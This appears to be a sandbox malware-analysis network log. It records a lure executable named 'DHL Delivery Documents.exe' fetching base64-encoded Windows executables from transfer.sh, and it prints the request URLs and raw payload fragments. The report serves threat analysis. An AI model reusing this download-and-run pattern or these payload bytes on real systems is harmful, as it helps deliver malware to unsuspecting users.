                        Jan 28, 2022 14:03:29.461170912 CET49752443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.461700916 CET49752443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.461728096 CET44349752144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.513365030 CET44349752144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.523406029 CET49752443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.523435116 CET44349752144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.882071018 CET44349752144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.882107973 CET44349752144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.882141113 CET44349752144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.882273912 CET49752443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.882297993 CET44349752144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.882316113 CET44349752144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.882322073 CET49752443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.882328987 CET44349752144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.882443905 CET49752443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.882453918 CET49752443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.905613899 CET44349752144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.905664921 CET44349752144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.905766964 CET44349752144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.905781984 CET49752443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.905798912 CET44349752144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.905802965 CET49752443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.906002998 CET44349752144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.906147003 CET49752443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.906156063 CET49752443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.907004118 CET49752443192.168.2.3144.76.136.153
                        TimestampSource PortDest PortSource IPDest IP
                        Jan 28, 2022 14:03:28.227101088 CET5391053192.168.2.38.8.8.8
                        Jan 28, 2022 14:03:28.246570110 CET53539108.8.8.8192.168.2.3
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Jan 28, 2022 14:03:28.227101088 CET192.168.2.38.8.8.80x9264Standard query (0)transfer.shA (IP address)IN (0x0001)
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Jan 28, 2022 14:03:28.246570110 CET8.8.8.8192.168.2.30x9264No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                        • transfer.sh
                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.349751144.76.136.153443C:\Users\user\Desktop\DHL Delivery Documents.exe
                        TimestampkBytes transferredDirectionData
                        2022-01-28 13:03:28 UTC0OUTGET /get/mVKia7/BINCC.txt HTTP/1.1
                        Host: transfer.sh
                        Connection: Keep-Alive
                        2022-01-28 13:03:29 UTC0INHTTP/1.1 200 OK
                        Server: nginx/1.14.2
                        Date: Fri, 28 Jan 2022 13:03:29 GMT
                        Content-Type: text/plain; charset=utf-8
                        Content-Length: 223232
                        Connection: close
                        Content-Disposition: attachment; filename="BINCC.txt"
                        Retry-After: Fri, 28 Jan 2022 14:03:32 GMT
                        X-Made-With: <3 by DutchCoders
                        X-Ratelimit-Key: 127.0.0.1,84.17.52.16,84.17.52.16
                        X-Ratelimit-Limit: 10
                        X-Ratelimit-Rate: 600
                        X-Ratelimit-Remaining: 9
                        X-Ratelimit-Reset: 1643375012
                        X-Remaining-Days: n/a
                        X-Remaining-Downloads: n/a
                        X-Served-By: Proudly served by DutchCoders
                        2022-01-28 13:03:29 UTC0INData Raw: 54 56 70 46 55 75 67 41 41 41 41 41 57 49 50 6f 43 59 76 49 67 38 41 38 69 77 41 44 77 59 50 41 4b 41 4d 49 2f 2b 47 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 75 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 39 5a 6a 38 62 4f 51 64 52 53 44 6b 48 55 55 67 35 42 31 46 49 49 70 72 36 53 48 55 48 55 55 67 69 6d 73 39 49 4f 67 64 52 53 43 4b 61 7a 45 67 34 42 31 46 49 55 6d 6c 6a 61 44 6b 48 55 55 67 41 41 41 41 41 41 41 41 41 41 46 42 46 41 41 42 4d 41 51 45
                        Data Ascii: TVpFUugAAAAAWIPoCYvIg8A8iwADwYPAKAMI/+GQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB9Zj8bOQdRSDkHUUg5B1FIIpr6SHUHUUgims9IOgdRSCKazEg4B1FIUmljaDkHUUgAAAAAAAAAAFBFAABMAQE
                        2022-01-28 13:03:29 UTC16INData Raw: 65 59 41 2f 77 44 2f 77 63 45 49 67 65 48 2f 41 50 38 41 43 2f 47 42 66 52 51 41 41 51 41 41 69 58 49 63 44 34 55 55 41 51 41 41 69 33 55 49 4d 39 75 4a 58 52 43 4c 65 42 67 50 74 70 51 65 42 41 6b 41 41 4d 48 69 45 49 76 50 77 66 6b 51 67 65 48 2f 41 41 41 41 69 30 79 4f 42 49 48 68 41 41 44 2f 2f 7a 50 4b 69 39 66 42 2b 67 69 42 34 76 38 41 41 41 43 4c 56 4a 59 45 67 65 49 41 41 50 38 41 77 65 45 49 4d 38 71 4c 31 38 48 36 47 49 48 69 2f 77 41 41 41 41 2b 32 56 4a 59 46 4d 38 71 4c 31 34 48 69 2f 77 41 41 41 49 74 55 6c 67 53 42 34 67 44 2f 41 41 41 7a 79 6a 4e 49 2f 49 73 51 4d 39 47 4a 53 42 79 4c 53 41 51 7a 79 6f 6c 51 49 49 74 51 43 44 50 52 69 55 67 6b 69 56 41 6f 67 2f 73 47 44 34 53 4a 41 41 41 41 69 38 72 42 2b 52 69 42 34 66 38 41 41 41 43 4c
                        Data Ascii: eYA/wD/wcEIgeH/AP8AC/GBfRQAAQAAiXIcD4UUAQAAi3UIM9uJXRCLeBgPtpQeBAkAAMHiEIvPwfkQgeH/AAAAi0yOBIHhAAD//zPKi9fB+giB4v8AAACLVJYEgeIAAP8AweEIM8qL18H6GIHi/wAAAA+2VJYFM8qL14Hi/wAAAItUlgSB4gD/AAAzyjNI/IsQM9GJSByLSAQzyolQIItQCDPRiUgkiVAog/sGD4SJAAAAi8rB+RiB4f8AAACL
                        2022-01-28 13:03:29 UTC32INData Raw: 63 4e 78 45 43 73 6c 79 64 6c 56 69 2b 79 4c 54 51 69 4c 67 64 67 48 41 41 43 46 77 48 51 53 67 37 68 6b 49 41 41 41 41 48 51 4a 55 65 6a 42 39 76 2f 2f 67 38 51 45 58 63 4f 6f 62 66 53 4b 4f 2f 36 65 74 49 55 4a 42 53 31 56 69 2b 79 42 37 4b 41 43 41 41 43 4c 52 51 79 4c 53 41 68 54 4d 39 74 57 61 50 34 42 41 41 43 4e 68 57 4c 39 2f 2f 38 7a 30 6c 4e 51 69 56 33 51 69 55 33 4d 78 30 57 6b 47 41 41 41 41 49 6c 64 71 49 6c 64 73 49 6c 64 72 49 6c 64 74 49 6c 64 75 47 61 4a 6c 57 44 39 2f 2f 2f 6f 5a 6b 49 42 41 49 74 31 43 49 31 4e 7a 46 47 4e 56 61 52 53 61 41 45 45 41 41 43 4e 52 51 78 51 56 75 69 63 49 41 45 41 67 38 51 67 68 63 41 50 69 50 67 41 41 41 43 4c 68 71 41 4c 41 41 42 58 61 50 64 65 46 4d 78 54 55 31 43 4e 66 68 78 58 78 30 58 55 58 41 42 6c
                        Data Ascii: cNxECslydlVi+yLTQiLgdgHAACFwHQSg7hkIAAAAHQJUejB9v//g8QEXcOobfSKO/6etIUJBS1Vi+yB7KACAACLRQyLSAhTM9tWaP4BAACNhWL9//8z0lNQiV3QiU3Mx0WkGAAAAIldqIldsIldrIldtIlduGaJlWD9///oZkIBAIt1CI1NzFGNVaRSaAEEAACNRQxQVuicIAEAg8QghcAPiPgAAACLhqALAABXaPdeFMxTU1CNfhxXx0XUXABl
                        2022-01-28 13:03:29 UTC48INData Raw: 4d 48 41 42 51 50 47 41 34 53 39 77 50 37 2f 2f 34 6c 64 39 49 32 30 43 4a 6c 35 67 6c 71 4c 54 66 69 4c 52 66 7a 42 79 67 4b 4c 32 59 6c 56 2f 49 6c 31 2b 50 66 54 49 39 45 6a 32 4d 48 47 42 51 76 61 69 31 58 30 41 2f 4d 44 74 4c 33 45 2f 76 2f 2f 69 55 58 30 69 30 58 34 6a 62 51 57 6d 58 6d 43 57 6f 74 56 2f 4d 48 4a 41 6f 50 48 42 59 76 65 69 56 33 34 69 58 33 38 67 2f 38 55 44 34 7a 79 2f 76 2f 2f 76 78 51 41 41 41 44 42 78 67 57 4c 32 6a 50 5a 4d 39 67 44 38 77 4f 30 76 62 54 2b 2f 2f 2b 4c 58 66 54 42 79 41 4b 4a 56 66 53 4e 74 42 36 68 36 39 6c 75 69 31 33 34 69 58 58 34 77 63 59 46 69 39 45 7a 30 44 50 54 41 2f 49 44 74 4c 32 34 2f 76 2f 2f 69 31 58 30 6a 5a 51 57 6f 65 76 5a 62 73 48 4c 41 6f 76 77 4d 38 4f 4a 54 66 53 4c 54 66 67 7a 77 59 6c 56
                        Data Ascii: MHABQPGA4S9wP7//4ld9I20CJl5glqLTfiLRfzBygKL2YlV/Il1+PfTI9Ej2MHGBQvai1X0A/MDtL3E/v//iUX0i0X4jbQWmXmCWotV/MHJAoPHBYveiV34iX38g/8UD4zy/v//vxQAAADBxgWL2jPZM9gD8wO0vbT+//+LXfTByAKJVfSNtB6h69lui134iXX4wcYFi9Ez0DPTA/IDtL24/v//i1X0jZQWoevZbsHLAovwM8OJTfSLTfgzwYlV
                        2022-01-28 13:03:29 UTC64INData Raw: 32 67 41 49 41 41 41 56 75 68 4d 35 41 41 41 4d 38 6d 44 78 41 69 46 77 41 2b 56 77 59 6d 47 36 41 63 41 41 46 36 4c 77 59 76 6c 58 63 4f 66 6e 42 6b 79 61 56 57 4c 37 49 48 73 56 41 49 41 41 46 59 7a 77 47 67 47 41 67 41 41 55 49 32 4e 72 76 33 2f 2f 31 46 6d 69 59 57 73 2f 66 2f 2f 36 4a 76 69 41 41 44 6f 68 52 55 42 41 46 44 6f 49 4f 67 41 41 49 74 31 43 49 50 45 45 49 6d 47 33 44 34 41 41 4f 6a 71 2b 51 41 41 69 30 41 44 68 63 41 50 68 49 38 43 41 41 41 39 69 49 69 49 69 41 2b 45 68 41 49 41 41 46 64 71 50 31 61 4a 68 74 67 48 41 41 43 4e 76 70 51 4d 41 41 44 6f 70 48 34 41 41 49 75 57 70 41 77 41 41 46 42 71 41 47 6f 41 55 6c 66 6f 55 6e 38 41 41 47 70 41 56 6f 6d 47 73 41 77 41 41 4f 69 45 66 67 41 41 55 49 75 47 70 41 77 41 41 47 6f 41 61 67 42 51
                        Data Ascii: 2gAIAAAVuhM5AAAM8mDxAiFwA+VwYmG6AcAAF6LwYvlXcOfnBkyaVWL7IHsVAIAAFYzwGgGAgAAUI2Nrv3//1FmiYWs/f//6JviAADohRUBAFDoIOgAAIt1CIPEEImG3D4AAOjq+QAAi0ADhcAPhI8CAAA9iIiIiA+EhAIAAFdqP1aJhtgHAACNvpQMAADopH4AAIuWpAwAAFBqAGoAUlfoUn8AAGpAVomGsAwAAOiEfgAAUIuGpAwAAGoAagBQ
                        2022-01-28 13:03:29 UTC80INData Raw: 2b 68 43 73 67 41 41 67 38 51 49 58 37 67 42 41 41 41 41 58 6f 76 6c 58 63 50 48 4f 78 46 74 56 59 76 73 56 6f 74 31 43 46 62 6f 4d 37 55 41 41 41 50 41 55 46 62 6f 61 72 49 41 41 49 74 46 44 47 6f 41 55 46 62 6f 6a 72 59 41 41 46 62 6f 47 4c 55 41 41 49 50 45 48 47 61 44 66 45 62 2b 58 48 51 53 56 75 67 48 74 51 41 41 75 56 77 41 41 41 43 44 78 41 52 6d 69 51 78 47 56 75 6a 31 74 41 41 41 75 69 6f 41 41 41 43 44 78 41 52 6d 69 52 52 47 58 6c 33 44 64 66 6a 4f 6f 64 59 61 56 59 76 73 56 6f 74 31 43 46 64 57 36 4e 4b 30 41 41 41 44 77 46 42 57 36 41 6d 79 41 41 43 4c 52 51 78 71 41 46 42 57 36 43 32 32 41 41 42 57 36 4c 65 30 41 41 43 4c 66 52 43 44 78 42 78 6d 67 33 78 47 2f 6c 78 30 47 47 61 44 50 31 78 30 45 6c 62 6f 6e 62 51 41 41 4c 6c 63 41 41 41 41
                        Data Ascii: +hCsgAAg8QIX7gBAAAAXovlXcPHOxFtVYvsVot1CFboM7UAAAPAUFboarIAAItFDGoAUFbojrYAAFboGLUAAIPEHGaDfEb+XHQSVugHtQAAuVwAAACDxARmiQxGVuj1tAAAuioAAACDxARmiRRGXl3DdfjOodYaVYvsVot1CFdW6NK0AAADwFBW6AmyAACLRQxqAFBW6C22AABW6Le0AACLfRCDxBxmg3xG/lx0GGaDP1x0ElbonbQAALlcAAAA
                        2022-01-28 13:03:29 UTC96INData Raw: 52 68 71 41 47 6f 56 56 6c 66 6f 36 78 73 41 41 49 50 45 45 49 58 41 64 51 5a 66 58 6f 76 6c 58 63 4e 66 75 41 45 41 41 41 42 65 69 2b 56 64 77 32 4b 61 47 6c 57 4c 37 49 50 73 4d 44 50 41 56 6f 74 31 44 4d 5a 46 38 41 43 4a 52 66 47 4a 52 66 57 4a 52 66 6c 6d 69 55 58 39 69 45 58 2f 5a 6f 6c 46 30 49 6c 46 30 6f 6c 46 31 6f 6c 46 32 6f 6c 46 33 6f 6c 46 34 6f 6c 46 35 6f 6c 46 36 6d 61 4a 52 65 36 46 39 67 2b 45 79 77 41 41 41 49 74 47 43 49 50 34 41 6e 55 2b 44 37 64 57 45 49 74 31 43 49 31 4e 38 46 46 71 43 47 6f 41 55 6f 31 47 48 46 44 6f 43 6f 51 41 41 49 31 4e 38 46 47 4e 56 64 42 53 36 4c 32 49 41 41 43 4c 6a 67 51 4b 41 41 42 71 41 49 31 46 30 46 42 52 36 42 75 47 41 41 43 4e 56 64 42 53 36 30 43 44 2b 41 52 31 55 49 74 4f 45 49 74 31 43 49 31 46
                        Data Ascii: RhqAGoVVlfo6xsAAIPEEIXAdQZfXovlXcNfuAEAAABei+Vdw2KaGlWL7IPsMDPAVot1DMZF8ACJRfGJRfWJRflmiUX9iEX/ZolF0IlF0olF1olF2olF3olF4olF5olF6maJRe6F9g+EywAAAItGCIP4AnU+D7dWEIt1CI1N8FFqCGoAUo1GHFDoCoQAAI1N8FGNVdBS6L2IAACLjgQKAABqAI1F0FBR6BuGAACNVdBS60CD+AR1UItOEIt1CI1F
                        2022-01-28 13:03:29 UTC112INData Raw: 66 78 2f 5a 32 4b 54 50 7a 76 41 5a 49 43 38 43 39 2b 31 49 55 75 75 64 70 63 39 79 6f 47 37 56 43 4d 2b 55 4c 57 67 49 47 47 41 65 6f 64 69 74 6b 61 4c 68 69 4b 2b 58 58 35 31 7a 34 73 39 68 4e 4f 58 49 6d 6d 51 34 47 6c 36 33 56 61 49 47 59 35 70 55 50 51 46 51 62 47 4d 4b 6e 48 68 4b 45 6f 36 43 58 6e 73 54 65 45 38 48 53 66 78 67 38 4a 4c 4c 6c 4d 31 39 37 4b 32 4c 66 6b 49 73 70 63 36 62 55 48 2b 2f 6f 58 56 59 2f 33 55 68 43 73 7a 30 35 2f 45 30 79 4f 75 64 78 74 72 61 73 35 4a 4d 53 4b 77 58 77 57 72 58 7a 55 4d 73 6c 36 4d 62 48 52 4b 55 5a 49 58 7a 6a 51 6d 65 79 52 6b 52 6d 45 32 6b 66 2b 72 72 66 48 50 74 73 55 58 52 58 75 48 4f 68 54 73 48 4e 73 76 44 64 4d 42 36 46 58 6a 6a 71 46 2f 79 4b 52 4a 34 74 35 6e 79 30 6f 58 35 50 55 71 42 70 64 50
                        Data Ascii: fx/Z2KTPzvAZIC8C9+1IUuudpc9yoG7VCM+ULWgIGGAeoditkaLhiK+XX51z4s9hNOXImmQ4Gl63VaIGY5pUPQFQbGMKnHhKEo6CXnsTeE8HSfxg8JLLlM197K2LfkIspc6bUH+/oXVY/3UhCsz05/E0yOudxtras5JMSKwXwWrXzUMsl6MbHRKUZIXzjQmeyRkRmE2kf+rrfHPtsUXRXuHOhTsHNsvDdMB6FXjjqF/yKRJ4t5ny0oX5PUqBpdP
                        2022-01-28 13:03:29 UTC128INData Raw: 41 43 44 78 41 68 66 58 6c 75 4c 35 56 33 44 61 67 53 4e 52 64 78 51 6a 55 38 42 6a 56 63 53 55 63 64 46 33 43 4d 41 41 41 43 4a 56 64 6a 6f 51 43 49 41 41 47 6f 45 6a 56 58 59 55 6f 31 48 42 6c 44 6f 4d 53 49 41 41 47 6f 45 6a 55 59 55 55 49 31 50 44 46 48 47 52 77 76 71 36 42 34 69 41 41 43 4c 56 66 78 53 5a 73 64 48 45 44 4d 41 55 38 64 47 45 41 45 41 41 41 44 6f 35 79 45 41 41 49 50 45 4c 46 39 65 57 34 76 6c 58 63 4d 54 65 50 45 36 4b 79 5a 41 67 76 6b 53 76 6f 50 4c 56 59 76 73 69 30 55 49 69 30 67 51 56 6d 6f 48 61 67 42 52 6a 62 43 38 43 77 41 41 56 6c 44 6f 39 42 49 41 41 49 74 56 47 49 74 46 46 49 74 4e 45 49 50 45 46 46 4b 4c 56 51 78 51 69 77 5a 52 55 76 2f 51 58 6c 33 44 58 4e 70 38 4e 47 46 51 7a 57 6d 4e 71 31 57 4c 37 49 74 46 43 49 74 49
                        Data Ascii: ACDxAhfXluL5V3DagSNRdxQjU8BjVcSUcdF3CMAAACJVdjoQCIAAGoEjVXYUo1HBlDoMSIAAGoEjUYUUI1PDFHGRwvq6B4iAACLVfxSZsdHEDMAU8dGEAEAAADo5yEAAIPELF9eW4vlXcMTePE6KyZAgvkSvoPLVYvsi0UIi0gQVmoHagBRjbC8CwAAVlDo9BIAAItVGItFFItNEIPEFFKLVQxQiwZRUv/QXl3DXNp8NGFQzWmNq1WL7ItFCItI
                        2022-01-28 13:03:29 UTC144INData Raw: 30 45 4a 64 4d 65 46 51 50 6a 2f 2f 38 4e 67 66 56 44 48 68 55 54 34 2f 2f 2b 52 66 42 42 42 78 34 56 49 2b 50 2f 2f 43 31 6c 58 59 38 65 46 54 50 6a 2f 2f 34 71 31 36 68 33 48 68 56 44 34 2f 2f 39 35 72 41 6a 33 78 34 56 55 2b 50 2f 2f 43 4f 4f 74 63 38 65 46 57 50 6a 2f 2f 38 59 65 5a 61 48 48 68 56 7a 34 2f 2f 2f 6e 42 6a 33 4b 78 34 56 67 2b 50 2f 2f 78 43 62 53 4f 73 65 46 5a 50 6a 2f 2f 77 67 7a 2f 4c 4c 48 68 57 6a 34 2f 2f 2f 50 42 6c 56 68 69 49 31 73 2b 50 2f 2f 36 47 76 79 2f 2f 2b 44 78 41 79 4e 68 65 44 33 2f 2f 2b 46 39 6e 51 4b 54 67 2b 32 43 49 31 45 43 41 46 31 39 6f 31 77 41 51 2b 32 41 49 31 56 34 46 4a 51 56 75 68 44 36 2f 37 2f 4d 38 43 44 78 41 77 34 42 6e 51 48 51 49 41 38 42 67 42 31 2b 59 74 64 43 45 42 51 56 6c 50 6f 70 2f 48 2f
                        Data Ascii: 0EJdMeFQPj//8NgfVDHhUT4//+RfBBBx4VI+P//C1lXY8eFTPj//4q16h3HhVD4//95rAj3x4VU+P//COOtc8eFWPj//8YeZaHHhVz4///nBj3Kx4Vg+P//xCbSOseFZPj//wgz/LLHhWj4///PBlVhiI1s+P//6Gvy//+DxAyNheD3//+F9nQKTg+2CI1ECAF19o1wAQ+2AI1V4FJQVuhD6/7/M8CDxAw4BnQHQIA8BgB1+YtdCEBQVlPop/H/
                        2022-01-28 13:03:29 UTC160INData Raw: 50 6c 5a 4a 42 33 4d 75 47 4a 6f 54 50 42 43 6b 56 71 54 58 66 74 6f 67 78 55 73 30 52 75 74 68 58 33 67 59 35 67 6f 2b 74 6b 61 65 77 5a 2f 50 48 51 62 43 76 47 59 4e 57 77 37 7a 33 2b 65 58 43 6f 7a 30 63 71 72 4b 65 6a 79 47 30 41 39 48 36 47 31 79 30 2b 50 51 44 70 4e 76 4b 57 77 58 52 32 52 65 49 54 77 57 64 66 38 4b 62 36 31 71 6f 52 34 4e 6b 64 32 72 72 59 70 69 75 79 4c 73 64 72 52 73 42 6c 2f 33 6c 64 65 64 37 56 51 48 34 43 49 5a 71 71 7a 4a 57 46 7a 49 63 58 64 74 58 72 43 39 54 4b 61 63 46 41 72 46 74 72 7a 49 4b 7a 6e 73 31 4c 4a 62 63 72 52 51 67 49 61 79 50 50 71 53 76 34 50 44 2f 38 69 34 39 2b 41 6d 5a 4a 39 65 48 4b 74 6a 37 7a 63 61 67 34 52 72 70 69 30 57 64 33 59 63 47 2f 32 2f 6b 77 47 62 39 39 66 6d 54 72 4a 4f 2b 55 42 2b 42 72 52
                        Data Ascii: PlZJB3MuGJoTPBCkVqTXftogxUs0RuthX3gY5go+tkaewZ/PHQbCvGYNWw7z3+eXCoz0cqrKejyG0A9H6G1y0+PQDpNvKWwXR2ReITwWdf8Kb61qoR4Nkd2rrYpiuyLsdrRsBl/3lded7VQH4CIZqqzJWFzIcXdtXrC9TKacFArFtrzIKzns1LJbcrRQgIayPPqSv4PD/8i49+AmZJ9eHKtj7zcag4Rrpi0Wd3YcG/2/kwGb99fmTrJO+UB+BrR
                        2022-01-28 13:03:29 UTC176INData Raw: 61 72 30 6b 4d 6e 52 6d 37 5a 31 62 39 45 41 78 44 5a 49 4d 6b 68 78 51 64 57 62 58 55 6e 4f 4f 79 76 69 4c 42 75 73 5a 44 57 52 58 30 58 6b 6e 38 42 4f 68 4c 46 77 70 36 34 6a 48 39 64 43 4c 38 4f 58 67 75 6b 4c 42 6e 4f 76 75 32 51 59 78 33 6e 32 33 51 36 61 4c 56 43 7a 42 78 71 43 35 4f 68 62 79 30 36 45 46 43 72 36 72 64 42 50 32 31 71 48 63 34 38 4d 6f 31 7a 34 52 73 49 36 32 34 51 53 33 6a 77 4e 65 36 54 68 39 49 64 6b 4f 5a 72 63 70 2f 58 42 57 59 4b 38 76 48 7a 70 54 4c 67 59 70 6a 50 45 71 67 66 73 31 45 38 74 69 77 4f 74 62 72 61 4c 2b 67 53 4e 30 68 41 68 62 47 71 6f 6e 56 69 36 78 71 53 39 2f 57 41 37 36 30 76 67 4e 68 36 31 35 4b 6a 36 33 77 35 77 4f 61 63 53 49 46 6b 36 55 57 32 45 4a 77 45 79 67 35 2f 33 64 55 63 42 65 68 64 46 6d 54 73 49
                        Data Ascii: ar0kMnRm7Z1b9EAxDZIMkhxQdWbXUnOOyviLBusZDWRX0Xkn8BOhLFwp64jH9dCL8OXgukLBnOvu2QYx3n23Q6aLVCzBxqC5Ohby06EFCr6rdBP21qHc48Mo1z4RsI624QS3jwNe6Th9IdkOZrcp/XBWYK8vHzpTLgYpjPEqgfs1E8tiwOtbraL+gSN0hAhbGqonVi6xqS9/WA760vgNh615Kj63w5wOacSIFk6UW2EJwEyg5/3dUcBehdFmTsI
                        2022-01-28 13:03:29 UTC192INData Raw: 44 36 68 6f 67 6a 49 79 4e 63 53 74 65 38 33 35 4f 5a 73 56 31 77 74 43 67 75 6c 62 44 5a 49 41 72 78 37 38 45 79 4b 66 31 4c 67 64 69 43 47 4b 31 68 6e 4b 4b 67 65 68 36 74 69 70 77 32 72 62 4f 79 48 65 6d 71 4b 55 58 59 45 58 5a 31 30 4e 71 69 6e 44 37 79 35 4c 59 78 38 38 71 6b 62 70 4b 63 2b 41 46 6c 6f 48 52 36 4e 52 31 39 69 44 53 72 70 6f 4c 4a 74 63 4e 51 69 48 4b 2b 34 53 55 58 75 46 66 4d 4e 48 6d 6d 73 73 4e 6c 37 58 39 51 65 53 77 48 50 4f 64 34 77 35 32 65 53 65 68 56 48 74 36 62 7a 76 34 55 50 71 66 51 58 42 35 4f 58 52 4a 33 52 47 38 7a 37 5a 32 32 56 52 32 62 4c 47 6c 65 2f 44 47 69 45 45 45 6a 37 41 71 6a 4f 48 66 66 55 33 44 67 33 7a 2f 52 6e 35 4b 74 35 30 49 45 6e 45 4d 63 70 57 74 71 6a 50 39 77 53 30 57 61 6b 59 41 5a 52 5a 54 6d 5a
                        Data Ascii: D6hogjIyNcSte835OZsV1wtCgulbDZIArx78EyKf1LgdiCGK1hnKKgeh6tipw2rbOyHemqKUXYEXZ10NqinD7y5LYx88qkbpKc+AFloHR6NR19iDSrpoLJtcNQiHK+4SUXuFfMNHmmssNl7X9QeSwHPOd4w52eSehVHt6bzv4UPqfQXB5OXRJ3RG8z7Z22VR2bLGle/DGiEEEj7AqjOHffU3Dg3z/Rn5Kt50IEnEMcpWtqjP9wS0WakYAZRZTmZ
                        2022-01-28 13:03:29 UTC208INData Raw: 56 4d 39 6c 67 37 66 6a 64 7a 63 43 58 44 37 49 61 68 70 46 39 51 57 4a 6b 43 6b 6e 45 32 62 69 2f 59 47 35 38 77 4a 42 7a 69 64 2f 4b 4c 54 62 52 46 45 4f 64 75 72 47 5a 4e 52 35 6b 62 37 4b 31 49 4e 38 59 69 48 4a 4d 5a 39 52 72 36 4f 51 36 41 6b 4d 66 65 57 37 4d 4c 74 4b 78 69 57 4f 77 6b 66 68 53 73 39 4f 37 2b 66 4b 6d 6c 4e 56 59 37 47 44 66 55 74 44 35 4f 64 73 69 31 6b 71 62 7a 77 4d 50 76 2f 6f 47 66 41 61 64 70 79 6f 67 50 49 6b 4d 4f 4f 69 6c 4b 32 4b 50 68 72 75 49 66 35 31 44 4d 46 65 43 33 41 6d 58 75 7a 55 61 68 42 36 41 34 67 6a 4c 4b 50 76 30 45 44 6c 50 67 2b 57 77 7a 2b 69 35 35 6c 5a 72 75 66 30 73 66 62 70 64 52 48 4d 77 43 4b 4c 61 45 42 39 4a 56 2b 50 79 38 6f 36 44 35 56 78 57 6b 4d 74 59 47 62 34 55 41 67 6e 52 78 38 4c 69 68 4c
                        Data Ascii: VM9lg7fjdzcCXD7IahpF9QWJkCknE2bi/YG58wJBzid/KLTbRFEOdurGZNR5kb7K1IN8YiHJMZ9Rr6OQ6AkMfeW7MLtKxiWOwkfhSs9O7+fKmlNVY7GDfUtD5Odsi1kqbzwMPv/oGfAadpyogPIkMOOilK2KPhruIf51DMFeC3AmXuzUahB6A4gjLKPv0EDlPg+Wwz+i55lZruf0sfbpdRHMwCKLaEB9JV+Py8o6D5VxWkMtYGb4UAgnRx8LihL


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.349752144.76.136.153443C:\Users\user\Desktop\DHL Delivery Documents.exe
                        TimestampkBytes transferredDirectionData
                        2022-01-28 13:03:29 UTC218OUTGET /get/KkxDr1/bbbbbbbbbbb.txt HTTP/1.1
                        Host: transfer.sh
                        2022-01-28 13:03:29 UTC218INHTTP/1.1 200 OK
                        Server: nginx/1.14.2
                        Date: Fri, 28 Jan 2022 13:03:29 GMT
                        Content-Type: text/plain; charset=utf-8
                        Content-Length: 53932
                        Connection: close
                        Content-Disposition: attachment; filename="bbbbbbbbbbb.txt"
                        Retry-After: Fri, 28 Jan 2022 14:03:32 GMT
                        X-Made-With: <3 by DutchCoders
                        X-Ratelimit-Key: 127.0.0.1,84.17.52.16,84.17.52.16
                        X-Ratelimit-Limit: 10
                        X-Ratelimit-Rate: 600
                        X-Ratelimit-Remaining: 8
                        X-Ratelimit-Reset: 1643375012
                        X-Remaining-Days: n/a
                        X-Remaining-Downloads: n/a
                        X-Served-By: Proudly served by DutchCoders
                        2022-01-28 13:03:29 UTC219INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 45 65 38 32 45 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 41 4c 41 56 41 41 41 4a 59 41 41 41 43 61 41 41 41 41 41 41 41 41 55 72 55 41 41 41 41 67 41 41 41 41 77 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
